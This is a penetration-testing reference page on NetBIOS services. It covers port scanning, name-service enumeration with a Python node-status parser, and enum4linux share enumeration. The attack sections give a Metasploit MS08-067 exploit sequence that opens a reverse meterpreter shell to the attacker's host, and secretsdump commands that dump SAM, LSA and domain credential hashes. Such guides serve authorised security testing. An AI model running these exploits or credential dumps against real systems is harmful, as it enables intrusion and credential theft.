NetBIOS
Default Ports: 137/udp (name service), 138/udp (datagram service), 139/tcp (session service)
NetBIOS (Network Basic Input/Output System) is a session-layer API and protocol for communication within a local network. It lets applications on different computers talk over a LAN and was the basis of early Windows networking for name resolution and for sharing files and printers. Its use has declined as DNS and SMB directly over 445/tcp replaced it, but many networks still have hosts with NetBIOS over TCP/IP enabled, and those hosts hand out hostnames, workgroup or domain names, MAC addresses and share lists to anyone who asks, which is why it remains a useful recon target.
Recon
Identifying NetBIOS
You can use Nmap to check whether NetBIOS services are exposed on a target host. Ports 137 and 138 are UDP, so a default TCP scan of them tells you nothing; scan them with -sU and scan the session service on 139 over TCP:
nmap -sU -p 137,138 X.X.X.X
nmap -p 139 X.X.X.X
Enumeration
NetBIOS Name Service
NetBIOS over TCP/IP operates primarily on 137/udp for the name service, 138/udp for datagram distribution, and 139/tcp for the session service (which on Windows carries SMB, the same protocol that newer hosts also expose directly on 445/tcp). The name service is what translates human-friendly computer names on the network into IP addresses, and it answers node-status queries with every name a host has registered.
To find the NetBIOS names on a host or a range, send a node-status query to 137/udp; the reply lists the host's registered names with their service suffixes (for example <00> workstation, <20> file server, <1C> domain controllers), the workgroup or domain, and the MAC address. Any of the following tools do this:
nmblookup -A <IP>
nbtscan <IP>/30
sudo nmap -sU -sV -T4 --script nbstat.nse -p137 -Pn -n <IP>
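The three commands above all send the same thing on the wire: an RFC 1002 node-status (NBSTAT) query for the wildcard name "*" to 137/udp, and then decode the list of registered names in the reply. The following is an added example written for this page (it is not code from the original page or from nmblookup/nbtscan) that builds that query, parses a reply, and validates the transaction ID, flags and lengths so a malformed or spoofed datagram raises instead of being trusted. The sample reply, its host name WIN-SRV01, workgroup WORKGROUP and MAC address are constructed for offline use, not captured from a real host.

```python
"""NetBIOS Name Service node-status (NBSTAT) client and parser, per RFC 1001/1002. Added example; sample reply is constructed, not captured."""
import socket
import struct

NBNS_PORT = 137
QTYPE_NBSTAT, QCLASS_IN = 0x0021, 0x0001
SUFFIXES = {0x00: "Workstation Service", 0x03: "Messenger Service", 0x20: "File Server Service",
            0x1B: "Domain Master Browser", 0x1C: "Domain Controllers", 0x1D: "Master Browser",
            0x1E: "Browser Service Elections"}  # well-known 16th-byte suffixes (subset)

def encode_name(name: bytes, pad: bytes = b" ") -> bytes:
    """First-level encoding: pad to 16 bytes, then emit each nibble as chr(ord('A') + nibble)."""
    out = bytearray()
    for b in name.ljust(16, pad):
        out += bytes((0x41 + (b >> 4), 0x41 + (b & 0x0F)))
    return bytes(out)

def build_nbstat_request(txid: int) -> bytes:
    """12-byte header plus one question for the wildcard name '*' (NUL-padded), type NBSTAT."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)  # QDCOUNT=1, no flags set
    question = bytes([32]) + encode_name(b"*", pad=b"\x00") + b"\x00"
    return header + question + struct.pack(">HH", QTYPE_NBSTAT, QCLASS_IN)

def _skip_name(data: bytes, off: int) -> int:
    """Advance past a label sequence; a 0xC0 length prefix is a DNS-style compression pointer."""
    while True:
        if off >= len(data):
            raise ValueError("truncated name")
        length = data[off]
        if length == 0:
            return off + 1
        if length & 0xC0 == 0xC0:
            return off + 2
        off += 1 + length

def parse_nbstat_response(data: bytes, expected_txid=None) -> dict:
    """Parse a node-status reply into {'names': [...], 'mac': 'xx:xx:..'}; rejects malformed input."""
    if len(data) < 12:
        raise ValueError("short NBNS header")
    txid, flags, qdcount, ancount, _, _ = struct.unpack(">HHHHHH", data[:12])
    if expected_txid is not None and txid != expected_txid:
        raise ValueError("transaction id mismatch (stale or spoofed reply)")
    if not flags & 0x8000:
        raise ValueError("not a response")
    if flags & 0x000F:
        raise ValueError("NBNS error, rcode %d" % (flags & 0x000F))
    if ancount < 1:
        raise ValueError("no answer record")
    off = 12
    for _ in range(qdcount):  # echoed question section, if present
        off = _skip_name(data, off) + 4
    off = _skip_name(data, off)
    if len(data) < off + 10:
        raise ValueError("truncated RR header")
    rtype, _, _, rdlen = struct.unpack(">HHIH", data[off:off + 10])
    off += 10
    if rtype != QTYPE_NBSTAT:
        raise ValueError("unexpected RR type 0x%04x" % rtype)
    rdata = data[off:off + rdlen]
    if not rdata or len(rdata) < rdlen:
        raise ValueError("truncated RDATA")
    names, pos = [], 1
    for _ in range(rdata[0]):  # NUM_NAMES entries: 15-byte name, 1-byte suffix, 2-byte NAME_FLAGS
        entry = rdata[pos:pos + 18]
        if len(entry) < 18:
            raise ValueError("truncated name entry")
        nflags = struct.unpack(">H", entry[16:18])[0]
        names.append({"name": entry[:15].rstrip(b" ").decode("latin-1"), "suffix": entry[15],
                      "service": SUFFIXES.get(entry[15], "unknown"),
                      "group": bool(nflags & 0x8000), "active": bool(nflags & 0x0400)})
        pos += 18
    mac = rdata[pos:pos + 6]  # UNIT_ID, first field of the trailing statistics block
    return {"names": names, "mac": ":".join("%02x" % b for b in mac) if len(mac) == 6 else None}

def nbstat_query(ip: str, timeout: float = 2.0, txid: int = 0x1234) -> dict:
    """Send one node-status query to <ip>:137/udp and parse the reply (live use)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_nbstat_request(txid), (ip, NBNS_PORT))
        data, _ = s.recvfrom(4096)
    return parse_nbstat_response(data, expected_txid=txid)

def sample_response(txid: int = 0x1234) -> bytes:
    """Constructed reply from a hypothetical host WIN-SRV01 in WORKGROUP (assumed names, not a capture)."""
    entries = (b"WIN-SRV01".ljust(15) + b"\x00" + struct.pack(">H", 0x0400)    # unique, ACT flag
               + b"WIN-SRV01".ljust(15) + b"\x20" + struct.pack(">H", 0x0400)
               + b"WORKGROUP".ljust(15) + b"\x00" + struct.pack(">H", 0x8400))  # G (group) + ACT
    rdata = bytes([3]) + entries + bytes.fromhex("000c29abcdef") + b"\x00" * 40  # 46-byte statistics
    answer = (bytes([32]) + encode_name(b"*", pad=b"\x00") + b"\x00"
              + struct.pack(">HHIH", QTYPE_NBSTAT, QCLASS_IN, 0, len(rdata)) + rdata)
    return struct.pack(">HHHHHH", txid, 0x8400, 0, 1, 0, 0) + answer  # flags: response + authoritative

if __name__ == "__main__":
    import sys
    result = nbstat_query(sys.argv[1]) if len(sys.argv) > 1 else parse_nbstat_response(sample_response())
    for n in result["names"]:
        print("%-16s <%02x> %-6s %s" % (n["name"], n["suffix"], "GROUP" if n["group"] else "UNIQUE", n["service"]))
    print("MAC:", result["mac"])
```

Run it with no arguments to see the constructed reply decoded in nbtscan style, or with a target IP to query a live host on 137/udp. Two details matter for anyone writing their own scanner: the wildcard question name is padded with NUL bytes (encoding to CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA), whereas real names are padded with spaces, and the 16th byte of each returned name is a service suffix, not part of the name.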
Enumerating Shares and Sessions
enum4linux
enum4linux is a Perl wrapper around the Samba tools (smbclient, rpcclient, nmblookup, net) that enumerates Windows and Samba hosts over SMB on 139/tcp or 445/tcp, usually through an anonymous null session.
enum4linux -a X.X.X.X
The -a option runs all simple enumeration: NetBIOS names and workgroup or domain, OS information, users, groups, shares, the password policy and RID cycling. If the target refuses null sessions, supply credentials with -u <user> -p <password>.
Attack Vectors
Exploiting Known Vulnerabilities
Depending on the system's configuration and patch level, the SMB services reached through the 139/tcp session service (or 445/tcp) may still carry well-known remotely exploitable vulnerabilities.
MS08-067
MS08-067 (CVE-2008-4250) is a critical stack buffer overflow in the path-canonicalization code of the Windows Server service (netapi32.dll). It is reached without authentication through an RPC call over an SMB named pipe, and on unpatched Windows 2000, XP and Server 2003 it gives remote code execution as SYSTEM.
msfconsole
use exploit/windows/smb/ms08_067_netapi
set RHOSTS <target-ip>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <your-ip>
check
exploit
Recent Metasploit versions name the target option RHOSTS (older ones used RHOST). Run check first: the module can tell whether the target is patched before you fire an exploit that will crash the Server service on a non-vulnerable or wrong-language target.
Post-Exploitation
Dumping Hashes
With local administrator credentials, dump the target's SAM hashes, cached domain credentials and LSA secrets remotely using secretsdump.py from the Impacket suite (installed as impacket-secretsdump on Kali):
secretsdump.py <domain>/<user>:<password>@<target-ip>
If you hold an NT hash rather than a password, pass it with -hashes <LMHASH>:<NTHASH> instead. Against a domain controller, -just-dc skips the local SAM and dumps only the domain account hashes from NTDS.dit through DRSUAPI replication, which requires Domain Admin or equivalent replication rights:
secretsdump.py -just-dc <domain>/<user>@<target-ip>